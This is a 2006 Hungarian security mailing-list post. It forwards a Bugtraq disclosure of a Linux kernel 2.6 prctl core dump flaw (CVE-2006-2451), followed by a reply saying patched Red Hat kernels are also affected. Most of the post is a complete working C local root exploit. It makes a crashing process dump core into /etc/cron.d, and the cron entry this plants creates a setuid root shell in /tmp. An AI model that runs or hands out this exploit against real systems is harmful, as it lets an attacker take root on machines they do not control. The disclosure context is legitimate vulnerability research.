[guru] Fwd: [roman@rs-labs.com: Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit ( BID 18874 / CVE-2006-2451 )]
DATE: Mon, 17 Jul 2006 15:58:15 +0200
Helyi root shell szerezhető a 2.6-os Linux Kernel PRCTL core dump
kezelésének hibájának kihasználásával.
A hiba a 2.6.17.4-ben javított.
----- Forwarded message from Roman Medina-Heigl Hernandez <roman@rs-labs.com> -----
Date: Wed, 12 Jul 2006 02:15:49 +0200
From: Roman Medina-Heigl Hernandez <roman@rs-labs.com>
To: bugtraq@securityfocus.com
Subject: Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit
( BID 18874 / CVE-2006-2451 )
Cc: full-disclosure@lists.grok.org.uk, submit@milw0rm.com
User-Agent: Thunderbird 1.5.0.4 (Windows/20060516)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Maybe this is obvious for Paul Starzetz (as well as many other people) but
full-disclosure is not really "full" without exploit code.
Working exploit attached. You can also download it from:
http://www.rs-labs.com/exploitsntools/rs_prctl_kernel.c
Greetz to !dSR ppl :-)
- --
Saludos,
- -Roman
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)
iD8DBQFEtD815H+KferVZ0IRAjhKAKCtHnTCwV0D/kH3dt0HItQUPZ/JegCglaQM
vO8VFJyxf+EXy2buqTK4kVM=
=dzRm
-----END PGP SIGNATURE-----
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -i");
}
----- End forwarded message -----
----- Forwarded message from Jon Hart <jhart@spoofed.org> -----
Date: Wed, 12 Jul 2006 20:10:22 -0700
From: Jon Hart <jhart@spoofed.org>
To: Ariel Biener <ariel@post.tau.ac.il>
Subject: Re: [Full-disclosure] Re: Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit ( BID 18874 / CVE-2006-2451 )
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
User-Agent: Mutt/1.5.11+cvs20060403
On Thu, Jul 13, 2006 at 01:23:10AM +0300, Ariel Biener wrote:
> On Wednesday 12 July 2006 03:15, Roman Medina-Heigl Hernandez wrote:
>
> Ignore my previous post, it does create a setuid bash version in /tmp/sh, the
> reason it doesn't work is due to SELinux contexts.
This is an important note, IMO. While the original advisory states
that only kernels >= 2.6.13 and <= 2.6.17.4 are vulnerable, it looks
like, somehow, the same vulnerable code is present in patched Redhat
kernels. The previous poster had a 2.6.9 version, and I've just
verified that 2.6.9-11.ELsmp (provided with RH EL 4 update 1) is also
vulnerable.
If this is the case of backporting, this should come as no surprise. If
it is not a backport issue, what vulnerability is being exploited on
these supposedly older kernels?
-jon
----- End forwarded message -----